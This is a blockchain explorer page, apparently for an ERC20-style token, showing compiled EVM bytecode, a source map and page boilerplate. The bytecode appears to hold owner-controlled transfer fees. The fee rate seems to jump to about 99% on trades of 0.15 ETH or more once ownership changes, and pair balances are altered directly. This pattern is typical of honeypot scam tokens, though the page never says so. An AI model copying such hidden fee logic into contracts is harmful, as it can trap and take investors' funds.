0929050565b60008060408385031215610f5b57600080fd5b823591506020830135610f3d81610e8d565b600060208284031215610f7f57600080fd5b8135610f8a81610e8d565b9392505050565b600060208284031215610fa357600080fd5b5035919050565b600181811c90821680610fbe57607f821691505b602082108103610fde57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561039357610393610fe4565b80516001600160701b038116811461102457600080fd5b919050565b60008060006060848603121561103e57600080fd5b6110478461100d565b92506110556020850161100d565b9150604084015163ffffffff8116811461106e57600080fd5b809150509250925092565b60006020828403121561108b57600080fd5b8151610f8a81610e8d565b808202811582820484141761039357610393610fe4565b6000826110ca57634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561039357610393610fe456fea2646970667358221220b23eb2ae752fda752e6804e86cbcddfb237e8ad04fc587476e339691990e3c8864736f6c63430008110033
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb1461028e578063d5872687146102a1578063dd62ed3e146102b4578063f2fde38b146102c7578063f887ea40146102da57600080fd5b8063715018a6146102315780638da5cb5b1461023b57806395d89b4114610260578063a457c2d714610268578063a8aa1b311461027b57600080fd5b806339509351116100f457806339509351146101a6578063411adcb6146101b95780634808a9b4146101c2578063530ae6a1146101f557806370a082311461020857600080fd5b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017257806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102ed565b6040516101469190610e3f565b60405180910390f35b61016261015d366004610ea2565b61037f565b6040519015158152602001610146565b6003545b604051908152602001610146565b610162610192366004610ece565b610399565b60405160128152602001610146565b6101626101b4366004610ea2565b6103bd565b610176600a5481565b6101d56101d0366004610f0f565b6103df565b604080516001600160701b03938416815292909116602083015201610146565b610176610203366004610f48565b6104dc565b610176610216366004610f6d565b6001600160a01b031660009081526001602052604090205490565b61023961054b565b005b6000546001600160a01b03165b6040516001600160a01b039091168152602001610146565b61013961055f565b610162610276366004610ea2565b61056e565b600654610248906001600160a01b031681565b61016261029c366004610ea2565b6105ee565b6101766102af366004610f91565b6105fc565b6101766102c2366004610f0f565b610679565b6102396102d5366004610f6d565b6106a4565b600754610248906001600160a01b031681565b6060600480546102fc90610faa565b80601f016020809104026020016040519081016040528092919081815260200182805461032890610faa565b80156103755780601f1061034a57610100808354040283529160200191610375565b820191906000526020600020905b81548152906001019060200180831161035857829003601f168201915b5050505050905090565b60003361038d81858561093a565b60019150505b92915050565b6000336103a7858285610a5e565b6103b2858585610ad8565b506001949350505050565b60003361038d8185856103d08383610679565b6103da9190610ffa565b61093a565b600080600080856001600160a01b0316630902f1ac6040518163ffffffff1660e01b8152600401606060405180830381865afa158015610423573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104479190611029565b5091509150809350819250846001600160a01b0316866001600160a01b0316630dfe16816040518163ffffffff1660e01b8152600401602060405180830381865afa15801561049a573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104be9190611079565b6001600160a01b0316036104d3578193508092505b50509250929050565b600654600090819081906104f9906001600160a01b0316856103df565b91509150806001600160701b031660000361051957600092505050610393565b806001600160701b031685836001600160701b03166105389190611096565b61054291906110ad565b95945050505050565b610553610bb0565b61055d60006106a4565b565b6060600580546102fc90610faa565b6000338161057c8286610679565b9050838110156105e15760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6103b2828686840361093a565b60003361038d818585610ad8565b600061039382600760009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610655573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906102039190611079565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6106ac610bb0565b6126ae600a556106bb81610c0a565b50565b6001600160a01b0382166107145760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064016105d8565b80600360008282546107269190610ffa565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6001600160a01b03166000908152600860205260409020805460ff19166001179055565b600780546001600160a01b0319166001600160a01b0383169081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa1580156107fc573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108209190611079565b6001600160a01b031663c9c6539630600760009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610882573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108a69190611079565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156108f3573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109179190611079565b600680546001600160a01b0319166001600160a01b039290921691909117905550565b6001600160a01b03831661099c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016105d8565b6001600160a01b0382166109fd5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016105d8565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610a6a8484610679565b90506000198114610ad25781811015610ac55760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016105d8565b610ad2848484840361093a565b50505050565b6000610af2846006546001600160a01b0391821691161490565b15610b29576001600160a01b03831660009081526008602052604090205460ff16610b2457610b218483610c5a565b90505b610b9c565b6006546001600160a01b03848116911603610b9c576001600160a01b03841660009081526008602052604090205460ff16610b9c57610b688483610c84565b600c543060009081526001602052604090205491925011610b9c5730600090815260016020526040902054610b9c90610cd6565b610ad28484610bab84866110cf565b610d59565b6000546001600160a01b0316331461055d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016105d8565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000600b5460095483610c6d9190611096565b610c7791906110ad565b9050610393833083610d59565b600080610c90836105fc565b600a54909150670214e8348c4f00008210610caa57506126ae5b600b54610cb78286611096565b610cc191906110ad565b9250610cce853085610d59565b505092915050565b600654610cee9030906001600160a01b031683610d59565b600660009054906101000a90046001600160a01b03166001600160a01b031663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b158015610d3e57600080fd5b505af1158015610d52573d6000803e3d6000fd5b5050505050565b6001600160a01b03831660009081526001602052604090205481811015610dd15760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016105d8565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610e319086815260200190565b60405180910390a350505050565b600060208083528351808285015260005b81811015610e6c57858101830151858201604001528201610e50565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146106bb57600080fd5b60008060408385031215610eb557600080fd5b8235610ec081610e8d565b946020939093013593505050565b600080600060608486031215610ee357600080fd5b8335610eee81610e8d565b92506020840135610efe81610e8d565b929592945050506040919091013590565b60008060408385031215610f2257600080fd5b8235610f2d81610e8d565b91506020830135610f3d81610e8d565b809150509250929050565b60008060408385031215610f5b57600080fd5b823591506020830135610f3d81610e8d565b600060208284031215610f7f57600080fd5b8135610f8a81610e8d565b9392505050565b600060208284031215610fa357600080fd5b5035919050565b600181811c90821680610fbe57607f821691505b602082108103610fde57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561039357610393610fe4565b80516001600160701b038116811461102457600080fd5b919050565b60008060006060848603121561103e57600080fd5b6110478461100d565b92506110556020850161100d565b9150604084015163ffffffff8116811461106e57600080fd5b809150509250925092565b60006020828403121561108b57600080fd5b8151610f8a81610e8d565b808202811582820484141761039357610393610fe4565b6000826110ca57634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561039357610393610fe456fea2646970667358221220b23eb2ae752fda752e6804e86cbcddfb237e8ad04fc587476e339691990e3c8864736f6c63430008110033
Deployed Bytecode Sourcemap
23478:1616:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10178:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12529:201;;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;12529:201:0;1023:187:1;11298:108:0;11386:12;;11298:108;;;1361:25:1;;;1349:2;1334:18;11298:108:0;1215:177:1;13310:295:0;;;;;;:::i;:::-;;:::i;11140:93::-;;;11223:2;2000:36:1;;1988:2;1973:18;11140:93:0;1858:184:1;14014:238:0;;;;;;:::i;:::-;;:::i;23579:27::-;;;;;;22224:384;;;;;;:::i;:::-;;:::i;:::-;;;;-1:-1:-1;;;;;2681:15:1;;;2663:34;;2733:15;;;;2728:2;2713:18;;2706:43;2587:18;22224:384:0;2440:315:1;22760:272:0;;;;;;:::i;:::-;;:::i;11469:127::-;;;;;;:::i;:::-;-1:-1:-1;;;;;11570:18:0;11543:7;11570:18;;;:9;:18;;;;;;;11469:127;6486:102;;;:::i;:::-;;5838:87;5884:7;5911:6;-1:-1:-1;;;;;5911:6:0;5838:87;;;-1:-1:-1;;;;;3496:32:1;;;3478:51;;3466:2;3451:18;5838:87:0;3332:203:1;10397:104:0;;;:::i;14755:424::-;;;;;;:::i;:::-;;:::i;21527:19::-;;;;;-1:-1:-1;;;;;21527:19:0;;;11802:193;;;;;;:::i;:::-;;:::i;22614:140::-;;;;;;:::i;:::-;;:::i;12058:151::-;;;;;;:::i;:::-;;:::i;6743:245::-;;;;;;:::i;:::-;;:::i;21553:21::-;;;;;-1:-1:-1;;;;;21553:21:0;;;10178:100;10232:13;10265:5;10258:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10178:100;:::o;12529:201::-;12612:4;4481:10;12668:32;4481:10;12684:7;12693:6;12668:8;:32::i;:::-;12718:4;12711:11;;;12529:201;;;;;:::o;13310:295::-;13441:4;4481:10;13499:38;13515:4;4481:10;13530:6;13499:15;:38::i;:::-;13548:27;13558:4;13564:2;13568:6;13548:9;:27::i;:::-;-1:-1:-1;13593:4:0;;13310:295;-1:-1:-1;;;;13310:295:0:o;14014:238::-;14102:4;4481:10;14158:64;4481:10;14174:7;14211:10;14183:25;4481:10;14174:7;14183:9;:25::i;:::-;:38;;;;:::i;:::-;14158:8;:64::i;22224:384::-;22300:15;22317;22346:17;22365;22393:5;-1:-1:-1;;;;;22387:24:0;;:26;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;22345:68;;;;;22434:9;22424:19;;22464:9;22454:19;;22513:6;-1:-1:-1;;;;;22488:31:0;22494:5;-1:-1:-1;;;;;22488:19:0;;:21;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;22488:31:0;;22484:117;;22546:9;22536:19;;22580:9;22570:19;;22484:117;22334:274;;22224:384;;;;;:::o;22760:272::-;22916:4;;22838:7;;;;;;22901:26;;-1:-1:-1;;;;;22916:4:0;22922;22901:14;:26::i;:::-;22858:69;;;;22942:11;-1:-1:-1;;;;;22942:16:0;22957:1;22942:16;22938:30;;22967:1;22960:8;;;;;;22938:30;23013:11;-1:-1:-1;;;;;22986:38:0;22998:12;22986:9;-1:-1:-1;;;;;22986:24:0;;;;;:::i;:::-;:38;;;;:::i;:::-;22979:45;22760:272;-1:-1:-1;;;;;22760:272:0:o;6486:102::-;5724:13;:11;:13::i;:::-;6551:29:::1;6577:1;6551:17;:29::i;:::-;6486:102::o:0;10397:104::-;10453:13;10486:7;10479:14;;;;;:::i;14755:424::-;14848:4;4481:10;14848:4;14931:25;4481:10;14948:7;14931:9;:25::i;:::-;14904:52;;14995:15;14975:16;:35;;14967:85;;;;-1:-1:-1;;;14967:85:0;;6096:2:1;14967:85:0;;;6078:21:1;6135:2;6115:18;;;6108:30;6174:34;6154:18;;;6147:62;-1:-1:-1;;;6225:18:1;;;6218:35;6270:19;;14967:85:0;;;;;;;;;15080:60;15089:5;15096:7;15124:15;15105:16;:34;15080:8;:60::i;11802:193::-;11881:4;4481:10;11937:28;4481:10;11954:2;11958:6;11937:9;:28::i;22614:140::-;22678:7;22705:41;22718:12;22732:6;;;;;;;;;-1:-1:-1;;;;;22732:6:0;-1:-1:-1;;;;;22732:11:0;;:13;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;12058:151::-;-1:-1:-1;;;;;12174:18:0;;;12147:7;12174:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;12058:151::o;6743:245::-;5724:13;:11;:13::i;:::-;6933:6:::1;6928:3;6921:19;6952:28;6971:8;6952:18;:28::i;:::-;6743:245:::0;:::o;16870:532::-;-1:-1:-1;;;;;16954:21:0;;16946:65;;;;-1:-1:-1;;;16946:65:0;;6502:2:1;16946:65:0;;;6484:21:1;6541:2;6521:18;;;6514:30;6580:33;6560:18;;;6553:61;6631:18;;16946:65:0;6300:355:1;16946:65:0;17102:6;17086:12;;:22;;;;;;;:::i;:::-;;;;-1:-1:-1;;;;;;;17245:18:0;;;;;;:9;:18;;;;;;;;:28;;;;;;17296:37;1361:25:1;;;17296:37:0;;1334:18:1;17296:37:0;;;;;;;16870:532;;:::o;23196:88::-;-1:-1:-1;;;;;23255:14:0;;;;;:7;:14;;;;;:21;;-1:-1:-1;;23255:21:0;23272:4;23255:21;;;23196:88::o;21583:177::-;21642:6;:25;;-1:-1:-1;;;;;;21642:25:0;-1:-1:-1;;;;;21642:25:0;;;;;;;;21694:16;;;-1:-1:-1;;;21694:16:0;;;;:14;;:16;;;;;;;;;;;;;;;21642:25;21694:16;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;21685:37:0;;21731:4;21738:6;;;;;;;;;-1:-1:-1;;;;;21738:6:0;-1:-1:-1;;;;;21738:11:0;;:13;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;21685:67;;-1:-1:-1;;;;;;21685:67:0;;;;;;;-1:-1:-1;;;;;6890:15:1;;;21685:67:0;;;6872:34:1;6942:15;;6922:18;;;6915:43;6807:18;;21685:67:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;21678:4;:74;;-1:-1:-1;;;;;;21678:74:0;-1:-1:-1;;;;;21678:74:0;;;;;;;;;;-1:-1:-1;21583:177:0:o;18828:380::-;-1:-1:-1;;;;;18964:19:0;;18956:68;;;;-1:-1:-1;;;18956:68:0;;7171:2:1;18956:68:0;;;7153:21:1;7210:2;7190:18;;;7183:30;7249:34;7229:18;;;7222:62;-1:-1:-1;;;7300:18:1;;;7293:34;7344:19;;18956:68:0;6969:400:1;18956:68:0;-1:-1:-1;;;;;19043:21:0;;19035:68;;;;-1:-1:-1;;;19035:68:0;;7576:2:1;19035:68:0;;;7558:21:1;7615:2;7595:18;;;7588:30;7654:34;7634:18;;;7627:62;-1:-1:-1;;;7705:18:1;;;7698:32;7747:19;;19035:68:0;7374:398:1;19035:68:0;-1:-1:-1;;;;;19116:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19168:32;;1361:25:1;;;19168:32:0;;1334:18:1;19168:32:0;;;;;;;18828:380;;;:::o;19499:441::-;19634:24;19661:25;19671:5;19678:7;19661:9;:25::i;:::-;19634:52;;-1:-1:-1;;19701:16:0;:37;19697:236;;19783:6;19763:16;:26;;19755:68;;;;-1:-1:-1;;;19755:68:0;;7979:2:1;19755:68:0;;;7961:21:1;8018:2;7998:18;;;7991:30;8057:31;8037:18;;;8030:59;8106:18;;19755:68:0;7777:353:1;19755:68:0;19859:51;19868:5;19875:7;19903:6;19884:16;:25;19859:8;:51::i;:::-;19623:317;19499:441;;;:::o;23963:563::-;24061:12;24088;24095:4;22048;;-1:-1:-1;;;;;22039:13:0;;;22048:4;;22039:13;;21962:98;24088:12;24084:388;;;-1:-1:-1;;;;;23376:14:0;;23352:4;23376:14;;;:7;:14;;;;;;;;24117:57;;24148:26;24161:4;24167:6;24148:12;:26::i;:::-;24141:33;;24117:57;24084:388;;;22048:4;;-1:-1:-1;;;;;22039:13:0;;;22048:4;;22039:13;24192:280;;-1:-1:-1;;;;;23376:14:0;;23352:4;23376:14;;;:7;:14;;;;;;;;24223:238;;24275:27;24289:4;24295:6;24275:13;:27::i;:::-;24353:12;;24343:4;11543:7;11570:18;;;:9;:18;;;;;;24268:34;;-1:-1:-1;;24321:124:0;;24438:4;11543:7;11570:18;;;:9;:18;;;;;;24388:57;;:31;:57::i;:::-;24482:36;24494:4;24500:2;24504:13;24513:4;24504:6;:13;:::i;:::-;24482:11;:36::i;6003:132::-;5884:7;5911:6;-1:-1:-1;;;;;5911:6:0;4481:10;6067:23;6059:68;;;;-1:-1:-1;;;6059:68:0;;8470:2:1;6059:68:0;;;8452:21:1;;;8489:18;;;8482:30;8548:34;8528:18;;;8521:62;8600:18;;6059:68:0;8268:356:1;7148:191:0;7222:16;7241:6;;-1:-1:-1;;;;;7258:17:0;;;-1:-1:-1;;;;;;7258:17:0;;;;;;7291:40;;7241:6;;;;;;;7291:40;;7222:16;7291:40;7211:128;7148:191;:::o;24534:203::-;24603:11;24652:8;;24642:7;;24633:6;:16;;;;:::i;:::-;:27;;;;:::i;:::-;24627:33;;24671:37;24683:4;24697;24704:3;24671:11;:37::i;24745:346::-;24815:11;24839:15;24857:20;24870:6;24857:12;:20::i;:::-;24906:8;;24839:38;;-1:-1:-1;24940:10:0;24929:21;;24925:43;;-1:-1:-1;24962:6:0;24925:43;25006:8;;24987:16;24996:7;24987:6;:16;:::i;:::-;:27;;;;:::i;:::-;24981:33;;25025:37;25037:4;25051;25058:3;25025:11;:37::i;:::-;25073:10;;24745:346;;;;:::o;22068:148::-;22166:4;;22139:40;;22159:4;;-1:-1:-1;;;;;22166:4:0;22172:6;22139:11;:40::i;:::-;22196:4;;;;;;;;;-1:-1:-1;;;;;22196:4:0;-1:-1:-1;;;;;22190:16:0;;:18;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;22068:148;:::o;16064:519::-;-1:-1:-1;;;;;16171:15:0;;16149:19;16171:15;;;:9;:15;;;;;;16205:21;;;;16197:72;;;;-1:-1:-1;;;16197:72:0;;8831:2:1;16197:72:0;;;8813:21:1;8870:2;8850:18;;;8843:30;8909:34;8889:18;;;8882:62;-1:-1:-1;;;8960:18:1;;;8953:36;9006:19;;16197:72:0;8629:402:1;16197:72:0;-1:-1:-1;;;;;16297:15:0;;;;;;;:9;:15;;;;;;16315:20;;;16297:38;;16503:13;;;;;;;;;;:23;;;;;;16549:26;;;;;;16329:6;1361:25:1;;1349:2;1334:18;;1215:177;16549:26:0;;;;;;;;16138:445;16064:519;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:1;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:1;1828:18;;;;1815:32;;1397:456::o;2047:388::-;2115:6;2123;2176:2;2164:9;2155:7;2151:23;2147:32;2144:52;;;2192:1;2189;2182:12;2144:52;2231:9;2218:23;2250:31;2275:5;2250:31;:::i;:::-;2300:5;-1:-1:-1;2357:2:1;2342:18;;2329:32;2370:33;2329:32;2370:33;:::i;:::-;2422:7;2412:17;;;2047:388;;;;;:::o;2760:315::-;2828:6;2836;2889:2;2877:9;2868:7;2864:23;2860:32;2857:52;;;2905:1;2902;2895:12;2857:52;2941:9;2928:23;2918:33;;3001:2;2990:9;2986:18;2973:32;3014:31;3039:5;3014:31;:::i;3080:247::-;3139:6;3192:2;3180:9;3171:7;3167:23;3163:32;3160:52;;;3208:1;3205;3198:12;3160:52;3247:9;3234:23;3266:31;3291:5;3266:31;:::i;:::-;3316:5;3080:247;-1:-1:-1;;;3080:247:1:o;3540:180::-;3599:6;3652:2;3640:9;3631:7;3627:23;3623:32;3620:52;;;3668:1;3665;3658:12;3620:52;-1:-1:-1;3691:23:1;;3540:180;-1:-1:-1;3540:180:1:o;3948:380::-;4027:1;4023:12;;;;4070;;;4091:61;;4145:4;4137:6;4133:17;4123:27;;4091:61;4198:2;4190:6;4187:14;4167:18;4164:38;4161:161;;4244:10;4239:3;4235:20;4232:1;4225:31;4279:4;4276:1;4269:15;4307:4;4304:1;4297:15;4161:161;;3948:380;;;:::o;4333:127::-;4394:10;4389:3;4385:20;4382:1;4375:31;4425:4;4422:1;4415:15;4449:4;4446:1;4439:15;4465:125;4530:9;;;4551:10;;;4548:36;;;4564:18;;:::i;4595:188::-;4674:13;;-1:-1:-1;;;;;4716:42:1;;4706:53;;4696:81;;4773:1;4770;4763:12;4696:81;4595:188;;;:::o;4788:450::-;4875:6;4883;4891;4944:2;4932:9;4923:7;4919:23;4915:32;4912:52;;;4960:1;4957;4950:12;4912:52;4983:40;5013:9;4983:40;:::i;:::-;4973:50;;5042:49;5087:2;5076:9;5072:18;5042:49;:::i;:::-;5032:59;;5134:2;5123:9;5119:18;5113:25;5178:10;5171:5;5167:22;5160:5;5157:33;5147:61;;5204:1;5201;5194:12;5147:61;5227:5;5217:15;;;4788:450;;;;;:::o;5243:251::-;5313:6;5366:2;5354:9;5345:7;5341:23;5337:32;5334:52;;;5382:1;5379;5372:12;5334:52;5414:9;5408:16;5433:31;5458:5;5433:31;:::i;5499:168::-;5572:9;;;5603;;5620:15;;;5614:22;;5600:37;5590:71;;5641:18;;:::i;5672:217::-;5712:1;5738;5728:132;;5782:10;5777:3;5773:20;5770:1;5763:31;5817:4;5814:1;5807:15;5845:4;5842:1;5835:15;5728:132;-1:-1:-1;5874:9:1;;5672:217::o;8135:128::-;8202:9;;;8223:11;;;8220:37;;;8237:18;;:::i
Swarm Source
ipfs://b23eb2ae752fda752e6804e86cbcddfb237e8ad04fc587476e339691990e3c88
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.